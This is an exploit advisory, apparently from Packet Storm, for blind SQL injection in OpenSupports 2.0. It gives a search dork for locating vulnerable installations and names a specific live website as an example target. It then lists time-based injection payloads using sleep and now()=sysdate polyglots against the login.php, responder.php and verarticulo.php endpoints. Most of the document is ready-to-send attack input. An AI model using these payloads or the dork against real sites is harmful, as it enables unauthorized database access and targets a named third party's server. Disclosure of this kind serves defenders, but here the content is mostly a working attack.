Open Supports version 2.0 suffers from a remote blind SQL injection vulnerability.
39c5d73c086e0f1c416ae0a90a2bcacc48e025ded4b414d20ccc44a07c834ba1Open Support Blind SQL Injection v2.0 Vulnerability
===================================================
Author indoushka
=================
vendor :http://www.opensupports.com/files/Opensupports_v2_EN.rar
=================
# Dork : Power by OpenSupports © 2009 - 2014. All Rights reserved
http://www.aot-algarve.com/support/index.php
This vulnerability affects /support/login.php
emailcorreoelectronico=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&pass=g00dPa%24%24w0rD&Submit2=Login
This vulnerability affects /support/responder.php.
idarticulo=&name=&staff=no&Submit=Send&text_content=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/
This vulnerability affects /support/verarticulo.php.
/support/verarticulo.php?id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed